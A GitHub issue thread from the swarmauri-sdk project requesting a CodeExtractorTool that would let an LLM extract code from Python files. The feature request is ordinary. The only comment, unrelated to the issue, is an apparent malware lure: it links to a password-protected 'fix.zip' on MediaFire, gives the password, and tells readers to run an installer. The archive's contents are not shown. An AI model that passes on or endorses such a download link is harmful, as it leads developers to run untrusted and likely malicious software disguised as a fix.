### ISSUE TITLE
[Feature Request]: CodeExtractorTool

### ISSUE THREAD

**Issue by cobycloud** [swarmauri/swarmauri-sdk#182]
### Feature Name

CodeExtractorTool

### Feature Description

A tool to enable an LLM to extract code from a python file.

To be based on the following code snippet by @RafaelJohn9 :

https://github.com/RafaelJohn9/swarmauri-playground/blob/30f6f4211308919a1c102aee1fdffeb62f3ddeb7/utilities/extract_code.py

### Motivation

@RafaelJohn9 offers a code snippet that "defines a function that extracts the code from a Python file,"

### Potential Solutions

TBA

### Affected Areas

Standard/Concrete

### Priority

Medium

### Tasks
- [ ] Test Case
- [ ] Tool

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
